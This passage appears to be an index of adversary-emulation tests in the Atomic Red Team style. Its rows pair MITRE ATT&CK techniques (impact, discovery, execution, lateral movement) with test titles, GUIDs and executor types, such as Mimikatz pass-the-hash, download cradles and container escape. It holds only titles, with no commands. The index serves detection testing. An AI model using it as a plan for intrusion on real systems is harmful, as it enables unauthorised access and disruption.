618 impact T1491.001 Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
619 impact T1496 Resource Hijacking 1 macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 bash
620 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
621 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
622 impact T1489 Service Stop 3 Windows - Stop service by killing process f3191b84-c38b-400b-867e-3a217a27795f command_prompt
623 impact T1529 System Shutdown/Reboot 1 Shutdown System - Windows ad254fa8-45c0-403b-8c77-e00b3d3e7a64 command_prompt
624 impact T1529 System Shutdown/Reboot 2 Restart System - Windows f4648f0d-bf78-483c-bafc-3ec99cd1c302 command_prompt
625 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb bash
626 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de bash
627 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 bash
628 impact T1529 System Shutdown/Reboot 6 Shutdown System via `halt` - Linux 918f70ab-e1ef-49ff-bc57-b27021df84dd bash
629 impact T1529 System Shutdown/Reboot 7 Reboot System via `halt` - Linux 78f92e14-f1e9-4446-b3e9-f1b921f2459e bash
630 impact T1529 System Shutdown/Reboot 8 Shutdown System via `poweroff` - Linux 73a90cd2-48a2-4ac5-8594-2af35fa909fa bash
631 impact T1529 System Shutdown/Reboot 9 Reboot System via `poweroff` - Linux 61303105-ff60-427b-999e-efb90b314e41 bash
632 discovery T1010 Application Window Discovery 1 List Process Main Windows - C# .NET fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 command_prompt
633 discovery T1217 Browser Bookmark Discovery 1 List Mozilla Firefox Bookmark Database Files on Linux 3a41f169-a5ab-407f-9269-abafdb5da6c2 sh
634 discovery T1217 Browser Bookmark Discovery 2 List Mozilla Firefox Bookmark Database Files on macOS 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b sh
635 discovery T1217 Browser Bookmark Discovery 3 List Google Chrome Bookmark JSON Files on macOS b789d341-154b-4a42-a071-9111588be9bc sh
636 discovery T1217 Browser Bookmark Discovery 4 List Google Chrome Bookmarks on Windows with powershell faab755e-4299-48ec-8202-fc7885eb6545 powershell
637 discovery T1217 Browser Bookmark Discovery 5 List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt 76f71e2f-480e-4bed-b61e-398fe17499d5 command_prompt
638 discovery T1217 Browser Bookmark Discovery 6 List Mozilla Firefox bookmarks on Windows with command prompt 4312cdbc-79fc-4a9c-becc-53d49c734bc5 command_prompt
639 discovery T1217 Browser Bookmark Discovery 7 List Internet Explorer Bookmarks using the command prompt 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 command_prompt
640 discovery T1087.002 Domain Account 1 Enumerate all accounts (Domain) 6fbc9e68-5ad7-444a-bd11-8bf3136c477e command_prompt
641 discovery T1087.002 Domain Account 2 Enumerate all accounts via PowerShell (Domain) 8b8a6449-be98-4f42-afd2-dedddc7453b2 powershell
642 discovery T1087.002 Domain Account 3 Enumerate logged on users via CMD (Domain) 161dcd85-d014-4f5e-900c-d3eaae82a0f7 command_prompt
643 discovery T1087.002 Domain Account 4 Automated AD Recon (ADRecon) 95018438-454a-468c-a0fa-59c800149b59 powershell
644 discovery T1087.002 Domain Account 5 Adfind -Listing password policy 736b4f53-f400-4c22-855d-1a6b5a551600 command_prompt
645 discovery T1087.002 Domain Account 6 Adfind - Enumerate Active Directory Admins b95fd967-4e62-4109-b48d-265edfd28c3a command_prompt
646 discovery T1087.002 Domain Account 7 Adfind - Enumerate Active Directory User Objects e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 command_prompt
647 discovery T1087.002 Domain Account 8 Adfind - Enumerate Active Directory Exchange AD Objects 5e2938fb-f919-47b6-8b29-2f6a1f718e99 command_prompt
648 discovery T1087.002 Domain Account 9 Enumerate Default Domain Admin Details (Domain) c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef command_prompt
649 discovery T1087.002 Domain Account 10 Enumerate Active Directory for Unconstrained Delegation 46f8dbe9-22a5-4770-8513-66119c5be63b powershell
650 discovery T1069.002 Domain Groups 1 Basic Permission Groups Discovery Windows (Domain) dd66d77d-8998-48c0-8024-df263dc2ce5d command_prompt
651 discovery T1069.002 Domain Groups 2 Permission Groups Discovery PowerShell (Domain) 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 powershell
652 discovery T1069.002 Domain Groups 3 Elevated group enumeration using net group (Domain) 0afb5163-8181-432e-9405-4322710c0c37 command_prompt
653 discovery T1069.002 Domain Groups 4 Find machines where user has local admin access (PowerView) a2d71eee-a353-4232-9f86-54f4288dd8c1 powershell
654 discovery T1069.002 Domain Groups 5 Find local admins on all machines in domain (PowerView) a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd powershell
655 discovery T1069.002 Domain Groups 6 Find Local Admins via Group Policy (PowerView) 64fdb43b-5259-467a-b000-1b02c00e510a powershell
656 discovery T1069.002 Domain Groups 7 Enumerate Users Not Requiring Pre Auth (ASRepRoast) 870ba71e-6858-4f6d-895c-bb6237f6121b powershell
657 discovery T1069.002 Domain Groups 8 Adfind - Query Active Directory Groups 48ddc687-82af-40b7-8472-ff1e742e8274 command_prompt
658 discovery T1482 Domain Trust Discovery 1 Windows - Discover domain trusts with dsquery 4700a710-c821-4e17-a3ec-9e4c81d6845f command_prompt
659 discovery T1482 Domain Trust Discovery 2 Windows - Discover domain trusts with nltest 2e22641d-0498-48d2-b9ff-c71e496ccdbe command_prompt
660 discovery T1482 Domain Trust Discovery 3 Powershell enumerate domains and forests c58fbc62-8a62-489e-8f2d-3565d7d96f30 powershell
661 discovery T1482 Domain Trust Discovery 4 Adfind - Enumerate Active Directory OUs d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec command_prompt
662 discovery T1482 Domain Trust Discovery 5 Adfind - Enumerate Active Directory Trusts 15fe436d-e771-4ff3-b655-2dca9ba52834 command_prompt
663 discovery T1083 File and Directory Discovery 1 File and Directory Discovery (cmd.exe) 0e36303b-6762-4500-b003-127743b80ba6 command_prompt
664 discovery T1083 File and Directory Discovery 2 File and Directory Discovery (PowerShell) 2158908e-b7ef-4c21-8a83-3ce4dd05a924 powershell
665 discovery T1083 File and Directory Discovery 3 Nix File and Diectory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
666 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
667 discovery T1087.001 Local Account 1 Enumerate all accounts (Local) f8aab3dd-5990-4bf8-b8ab-2226c951696f sh
668 discovery T1087.001 Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
669 discovery T1087.001 Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
670 discovery T1087.001 Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
671 discovery T1087.001 Local Account 5 Show if a user account has ever logged in remotely 0f0b6a29-08c3-44ad-a30b-47fd996b2110 sh
672 discovery T1087.001 Local Account 6 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
673 discovery T1087.001 Local Account 7 Enumerate users and groups 319e9f6c-7a9e-432e-8c62-9385c803b6f2 sh
674 discovery T1087.001 Local Account 8 Enumerate all accounts on Windows (Local) 80887bec-5a9b-4efc-a81d-f83eb2eb32ab command_prompt
675 discovery T1087.001 Local Account 9 Enumerate all accounts via PowerShell (Local) ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b powershell
676 discovery T1087.001 Local Account 10 Enumerate logged on users via CMD (Local) a138085e-bfe5-46ba-a242-74a6fb884af3 command_prompt
677 discovery T1087.001 Local Account 11 Enumerate logged on users via PowerShell 2bdc42c7-8907-40c2-9c2b-42919a00fe03 powershell
678 discovery T1069.001 Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
679 discovery T1069.001 Local Groups 2 Basic Permission Groups Discovery Windows (Local) 1f454dd6-e134-44df-bebb-67de70fb6cd8 command_prompt
680 discovery T1069.001 Local Groups 3 Permission Groups Discovery PowerShell (Local) a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 powershell
681 discovery T1046 Network Service Scanning 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 sh
682 discovery T1046 Network Service Scanning 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
683 discovery T1046 Network Service Scanning 3 Port Scan NMap for Windows d696a3cb-d7a8-4976-8eb5-5af4abf2e3df powershell
684 discovery T1046 Network Service Scanning 4 Port Scan using python 6ca45b04-9f15-4424-b9d3-84a217285a5c powershell
685 discovery T1135 Network Share Discovery 1 Network Share Discovery f94b5ad9-911c-4eff-9718-fd21899db4f7 sh
686 discovery T1135 Network Share Discovery 2 Network Share Discovery - linux 875805bc-9e86-4e87-be86-3a5527315cae bash
687 discovery T1135 Network Share Discovery 3 Network Share Discovery command prompt 20f1097d-81c1-405c-8380-32174d493bbb command_prompt
688 discovery T1135 Network Share Discovery 4 Network Share Discovery PowerShell 1b0814d1-bb24-402d-9615-1b20c50733fb powershell
689 discovery T1135 Network Share Discovery 5 View available share drives ab39a04f-0c93-4540-9ff2-83f862c385ae command_prompt
690 discovery T1135 Network Share Discovery 6 Share Discovery with PowerView b1636f0a-ba82-435c-b699-0d78794d8bfd powershell
691 discovery T1040 Network Sniffing 1 Packet Capture Linux 7fe741f7-b265-4951-a7c7-320889083b3e bash
692 discovery T1040 Network Sniffing 2 Packet Capture macOS 9d04efee-eff5-4240-b8d2-07792b873608 bash
693 discovery T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
694 discovery T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
695 discovery T1201 Password Policy Discovery 1 Examine password complexity policy - Ubuntu 085fe567-ac84-47c7-ac4c-2688ce28265b bash
696 discovery T1201 Password Policy Discovery 2 Examine password complexity policy - CentOS/RHEL 7.x 78a12e65-efff-4617-bc01-88f17d71315d bash
697 discovery T1201 Password Policy Discovery 3 Examine password complexity policy - CentOS/RHEL 6.x 6ce12552-0adb-4f56-89ff-95ce268f6358 bash
698 discovery T1201 Password Policy Discovery 4 Examine password expiration policy - All Linux 7c86c55c-70fa-4a05-83c9-3aa19b145d1a bash
699 discovery T1201 Password Policy Discovery 5 Examine local password policy - Windows 4588d243-f24e-4549-b2e3-e627acc089f6 command_prompt
700 discovery T1201 Password Policy Discovery 6 Examine domain password policy - Windows 46c2c362-2679-4ef5-aec9-0e958e135be4 command_prompt
701 discovery T1201 Password Policy Discovery 7 Examine password policy - macOS 4b7fa042-9482-45e1-b348-4b756b2a0742 bash
702 discovery T1120 Peripheral Device Discovery 1 Win32_PnPEntity Hardware Inventory 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 powershell
703 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
704 discovery T1057 Process Discovery 2 Process Discovery - tasklist c5806a4f-62b8-4900-980b-c7ec004e9908 command_prompt
705 discovery T1012 Query Registry 1 Query Registry 8f7578c4-9863-4d83-875c-a565573bbdf0 command_prompt
706 discovery T1018 Remote System Discovery 1 Remote System Discovery - net 85321a9c-897f-4a60-9f20-29788e50bccd command_prompt
707 discovery T1018 Remote System Discovery 2 Remote System Discovery - net group Domain Computers f1bf6c8f-9016-4edf-aff9-80b65f5d711f command_prompt
708 discovery T1018 Remote System Discovery 3 Remote System Discovery - nltest 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 command_prompt
709 discovery T1018 Remote System Discovery 4 Remote System Discovery - ping sweep 6db1f57f-d1d5-4223-8a66-55c9c65a9592 command_prompt
710 discovery T1018 Remote System Discovery 5 Remote System Discovery - arp 2d5a61f5-0447-4be4-944a-1f8530ed6574 command_prompt
711 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
712 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
713 discovery T1018 Remote System Discovery 8 Remote System Discovery - nslookup baa01aaa-5e13-45ec-8a0d-e46c93c9760f powershell
714 discovery T1018 Remote System Discovery 9 Remote System Discovery - adidnsdump 95e19466-469e-4316-86d2-1dc401b5a959 command_prompt
715 discovery T1018 Remote System Discovery 10 Adfind - Enumerate Active Directory Computer Objects a889f5be-2d54-4050-bd05-884578748bb4 command_prompt
716 discovery T1018 Remote System Discovery 11 Adfind - Enumerate Active Directory Domain Controller Objects 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e command_prompt
717 discovery T1518.001 Security Software Discovery 1 Security Software Discovery f92a380f-ced9-491f-b338-95a991418ce2 command_prompt
718 discovery T1518.001 Security Software Discovery 2 Security Software Discovery - powershell 7f566051-f033-49fb-89de-b6bacab730f0 powershell
719 discovery T1518.001 Security Software Discovery 3 Security Software Discovery - ps (macOS) ba62ce11-e820-485f-9c17-6f3c857cd840 sh
720 discovery T1518.001 Security Software Discovery 4 Security Software Discovery - ps (Linux) 23b91cd2-c99c-4002-9e41-317c63e024a2 sh
721 discovery T1518.001 Security Software Discovery 5 Security Software Discovery - Sysmon Service fe613cf3-8009-4446-9a0f-bc78a15b66c9 command_prompt
722 discovery T1518.001 Security Software Discovery 6 Security Software Discovery - AV Discovery via WMI 1553252f-14ea-4d3b-8a08-d7a4211aa945 command_prompt
723 discovery T1518 Software Discovery 1 Find and Display Internet Explorer Browser Version 68981660-6670-47ee-a5fa-7e74806420a4 command_prompt
724 discovery T1518 Software Discovery 2 Applications Installed c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b powershell
725 discovery T1518 Software Discovery 3 Find and Display Safari Browser Version 103d6533-fd2a-4d08-976a-4a598565280f sh
726 discovery T1497.001 System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
727 discovery T1497.001 System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
728 discovery T1497.001 System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
729 discovery T1082 System Information Discovery 1 System Information Discovery 66703791-c902-4560-8770-42b8a91f7667 command_prompt
730 discovery T1082 System Information Discovery 2 System Information Discovery edff98ec-0f73-4f63-9890-6b117092aff6 sh
731 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
732 discovery T1082 System Information Discovery 4 Linux VM Check via Hardware 31dad7ad-2286-4c02-ae92-274418c85fec bash
733 discovery T1082 System Information Discovery 5 Linux VM Check via Kernel Modules 8057d484-0fae-49a4-8302-4812c4f1e64e bash
734 discovery T1082 System Information Discovery 6 Hostname Discovery (Windows) 85cfbf23-4a1e-4342-8792-007e004b975f command_prompt
735 discovery T1082 System Information Discovery 7 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 bash
736 discovery T1082 System Information Discovery 8 Windows MachineGUID Discovery 224b4daf-db44-404e-b6b2-f4d1f0126ef8 command_prompt
737 discovery T1082 System Information Discovery 9 Griffon Recon 69bd4abe-8759-49a6-8d21-0f15822d6370 powershell
738 discovery T1082 System Information Discovery 10 Environment variables discovery on windows f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 command_prompt
739 discovery T1082 System Information Discovery 11 Environment variables discovery on macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
740 discovery T1016 System Network Configuration Discovery 1 System Network Configuration Discovery on Windows 970ab6a1-0157-4f3f-9a73-ec4166754b23 command_prompt
741 discovery T1016 System Network Configuration Discovery 2 List Windows Firewall Rules 038263cb-00f4-4b0a-98ae-0696c67e1752 command_prompt
742 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
743 discovery T1016 System Network Configuration Discovery 4 System Network Configuration Discovery (TrickBot Style) dafaf052-5508-402d-bf77-51e0700c02e2 command_prompt
744 discovery T1016 System Network Configuration Discovery 5 List Open Egress Ports 4b467538-f102-491d-ace7-ed487b853bf5 powershell
745 discovery T1016 System Network Configuration Discovery 6 Adfind - Enumerate Active Directory Subnet Objects 9bb45dd7-c466-4f93-83a1-be30e56033ee command_prompt
746 discovery T1016 System Network Configuration Discovery 7 Qakbot Recon 121de5c6-5818-4868-b8a7-8fd07c455c1b command_prompt
747 discovery T1016 System Network Configuration Discovery 8 List macOS Firewall Rules ff1d8c25-2aa4-4f18-a425-fede4a41ee88 bash
748 discovery T1049 System Network Connections Discovery 1 System Network Connections Discovery 0940a971-809a-48f1-9c4d-b1d785e96ee5 command_prompt
749 discovery T1049 System Network Connections Discovery 2 System Network Connections Discovery with PowerShell f069f0f1-baad-4831-aa2b-eddac4baac4a powershell
750 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
751 discovery T1049 System Network Connections Discovery 4 System Discovery using SharpView 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
752 discovery T1033 System Owner/User Discovery 1 System Owner/User Discovery 4c4959bf-addf-4b4a-be86-8d09cc1857aa command_prompt
753 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
754 discovery T1033 System Owner/User Discovery 3 Find computers where user has session - Stealth mode (PowerView) 29857f27-a36f-4f7e-8084-4557cd6207ca powershell
755 discovery T1007 System Service Discovery 1 System Service Discovery 89676ba1-b1f8-47ee-b940-2e1a113ebc71 command_prompt
756 discovery T1007 System Service Discovery 2 System Service Discovery - net.exe 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 command_prompt
757 discovery T1124 System Time Discovery 1 System Time Discovery 20aba24b-e61f-4b26-b4ce-4784f763ca20 command_prompt
758 discovery T1124 System Time Discovery 2 System Time Discovery - PowerShell 1d5711d6-655c-4a47-ae9c-6503c74fa877 powershell
759 execution T1059.002 AppleScript 1 AppleScript 3600d97d-81b9-4171-ab96-e4386506e2c2 sh
760 execution T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
761 execution T1053.002 At (Windows) 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
762 execution T1609 Container Administration Command 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
763 execution T1053.007 Container Orchestration Job 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
764 execution T1053.007 Container Orchestration Job 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
765 execution T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
766 execution T1053.003 Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
767 execution T1053.003 Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
768 execution T1610 Deploy Container 1 Deploy container using nsenter container escape 58004e22-022c-4c51-b4a8-2b85ac5c596b sh
769 execution T1559.002 Dynamic Data Exchange 1 Execute Commands f592ba2a-e9e8-4d62-a459-ef63abd819fd manual
770 execution T1559.002 Dynamic Data Exchange 2 Execute PowerShell script via Word DDE 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 command_prompt
771 execution T1559.002 Dynamic Data Exchange 3 DDEAUTO cf91174c-4e74-414e-bec0-8d60a104d181 manual
772 execution T1569.001 Launchctl 1 Launchctl 6fb61988-724e-4755-a595-07743749d4e2 bash
773 execution T1053.004 Launchd 1 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
774 execution T1204.002 Malicious File 1 OSTap Style Macro Execution 8bebc690-18c7-4549-bc98-210f7019efff powershell
775 execution T1204.002 Malicious File 2 OSTap Payload Download 3f3af983-118a-4fa1-85d3-ba4daa739d80 command_prompt
776 execution T1204.002 Malicious File 3 Maldoc choice flags command execution 0330a5d2-a45a-4272-a9ee-e364411c4b18 powershell
777 execution T1204.002 Malicious File 4 OSTAP JS version add560ef-20d6-4011-a937-2c340f930911 powershell
778 execution T1204.002 Malicious File 5 Office launching .bat file from AppData 9215ea92-1ded-41b7-9cd6-79f9a78397aa powershell
779 execution T1204.002 Malicious File 6 Excel 4 Macro 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 powershell
780 execution T1204.002 Malicious File 7 Headless Chrome code execution via VBA a19ee671-ed98-4e9d-b19c-d1954a51585a powershell
781 execution T1204.002 Malicious File 8 Potentially Unwanted Applications (PUA) 02f35d62-9fdc-4a97-b899-a5d9a876d295 powershell
782 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
783 execution T1059.001 PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
784 execution T1059.001 PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
785 execution T1059.001 PowerShell 3 Run Bloodhound from Memory using Download Cradle bf8c1441-4674-4dab-8e4e-39d93d08f9b7 powershell
786 execution T1059.001 PowerShell 4 Obfuscation Tests 4297c41a-8168-4138-972d-01f3ee92c804 powershell
787 execution T1059.001 PowerShell 5 Mimikatz - Cradlecraft PsSendKeys af1800cf-9f9d-4fd1-a709-14b1e6de020d powershell
788 execution T1059.001 PowerShell 6 Invoke-AppPathBypass 06a220b6-7e29-4bd8-9d07-5b4d86742372 command_prompt
789 execution T1059.001 PowerShell 7 Powershell MsXml COM object - with prompt 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da command_prompt
790 execution T1059.001 PowerShell 8 Powershell XML requests 4396927f-e503-427b-b023-31049b9b09a6 command_prompt
791 execution T1059.001 PowerShell 9 Powershell invoke mshta.exe download 8a2ad40b-12c7-4b25-8521-2737b0a415af command_prompt
792 execution T1059.001 PowerShell 10 Powershell Invoke-DownloadCradle cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 manual
793 execution T1059.001 PowerShell 11 PowerShell Fileless Script Execution fa050f5e-bc75-4230-af73-b6fd7852cd73 powershell
794 execution T1059.001 PowerShell 12 PowerShell Downgrade Attack 9148e7c4-9356-420e-a416-e896e9c0f73e powershell
795 execution T1059.001 PowerShell 13 NTFS Alternate Data Stream Access 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 powershell
796 execution T1059.001 PowerShell 14 PowerShell Session Creation and Use 7c1acec2-78fa-4305-a3e0-db2a54cddecd powershell
797 execution T1059.001 PowerShell 15 ATHPowerShellCommandLineParameter -Command parameter variations 686a9785-f99b-41d4-90df-66ed515f81d7 powershell
798 execution T1059.001 PowerShell 16 ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments 1c0a870f-dc74-49cf-9afc-eccc45e58790 powershell
799 execution T1059.001 PowerShell 17 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 powershell
800 execution T1059.001 PowerShell 18 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments 0d181431-ddf3-4826-8055-2dbf63ae848b powershell
801 execution T1059.006 Python 1 Execute shell script via python's command mode arguement 3a95cdb2-c6ea-4761-b24e-02b71889b8bb sh
802 execution T1059.006 Python 2 Execute Python via scripts (Linux) 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 sh
803 execution T1059.006 Python 3 Execute Python via Python executables (Linux) 0b44d79b-570a-4b27-a31f-3bf2156e5eaa sh
804 execution T1053.005 Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
805 execution T1053.005 Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
806 execution T1053.005 Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
807 execution T1053.005 Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
808 execution T1053.005 Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
809 execution T1053.005 Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
810 execution T1569.002 Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
811 execution T1569.002 Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
812 execution T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
813 execution T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
814 execution T1059.004 Unix Shell 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
815 execution T1059.004 Unix Shell 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
816 execution T1059.005 Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
817 execution T1059.005 Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
818 execution T1059.005 Visual Basic 3 Extract Memory via VBA 8faff437-a114-4547-9a60-749652a03df6 powershell
819 execution T1059.003 Windows Command Shell 1 Create and Execute Batch Script 9e8894c0-50bd-4525-a96c-d4ac78ece388 powershell
820 execution T1059.003 Windows Command Shell 2 Writes text to a file and displays it. 127b4afe-2346-4192-815c-69042bec570e command_prompt
821 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users c107778c-dcf5-47c5-af2e-1d058a3df3ea command_prompt
822 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes 5750aa16-0e59-4410-8b9a-8a47ca2788e2 command_prompt
823 execution T1047 Windows Management Instrumentation 3 WMI Reconnaissance Software 718aebaa-d0e0-471a-8241-c5afa69c7414 command_prompt
824 execution T1047 Windows Management Instrumentation 4 WMI Reconnaissance List Remote Services 0fd48ef7-d890-4e93-a533-f7dedd5191d3 command_prompt
825 execution T1047 Windows Management Instrumentation 5 WMI Execute Local Process b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 command_prompt
826 execution T1047 Windows Management Instrumentation 6 WMI Execute Remote Process 9c8ef159-c666-472f-9874-90c8d60d136b command_prompt
827 execution T1047 Windows Management Instrumentation 7 Create a Process using WMI Query and an Encoded Command 7db7a7f9-9531-4840-9b30-46220135441c command_prompt
828 execution T1047 Windows Management Instrumentation 8 Create a Process using obfuscated Win32_Process 10447c83-fc38-462a-a936-5102363b1c43 powershell
829 lateral-movement T1021.003 Distributed Component Object Model 1 PowerShell Lateral Movement using MMC20 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 powershell
830 lateral-movement T1550.002 Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
831 lateral-movement T1550.002 Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
832 lateral-movement T1550.003 Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
833 lateral-movement T1563.002 RDP Hijacking 1 RDP hijacking a37ac520-b911-458e-8aed-c5f1576d9f46 command_prompt
834 lateral-movement T1021.001 Remote Desktop Protocol 1 RDP to DomainController 355d4632-8cb9-449d-91ce-b566d0253d3e powershell
835 lateral-movement T1021.001 Remote Desktop Protocol 2 RDP to Server 7382a43e-f19c-46be-8f09-5c63af7d3e2b powershell
836 lateral-movement T1021.002 SMB/Windows Admin Shares 1 Map admin share 3386975b-367a-4fbb-9d77-4dcf3639ffd3 command_prompt
837 lateral-movement T1021.002 SMB/Windows Admin Shares 2 Map Admin Share PowerShell 514e9cd7-9207-4882-98b1-c8f791bae3c5 powershell
838 lateral-movement T1021.002 SMB/Windows Admin Shares 3 Copy and Execute File with PsExec 0eb03d41-79e4-4393-8e57-6344856be1cf command_prompt
839 lateral-movement T1021.002 SMB/Windows Admin Shares 4 Execute command writing output to local Admin Share d41aaab5-bdfe-431d-a3d5-c29e9136ff46 command_prompt
840 lateral-movement T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
841 lateral-movement T1021.006 Windows Remote Management 1 Enable Windows Remote Management 9059e8de-3d7d-4954-a322-46161880b9cf powershell
842 lateral-movement T1021.006 Windows Remote Management 2 Invoke-Command 5295bd61-bd7e-4744-9d52-85962a4cf2d6 powershell
843 lateral-movement T1021.006 Windows Remote Management 3 WinRM Access with Evil-WinRM efe86d95-44c4-4509-ae42-7bfd9d1f5b3d powershell
844 command-and-control T1071.004 DNS 1 DNS Large Query Volume 1700f5d6-5a44-487b-84de-bc66f507b0a6 powershell
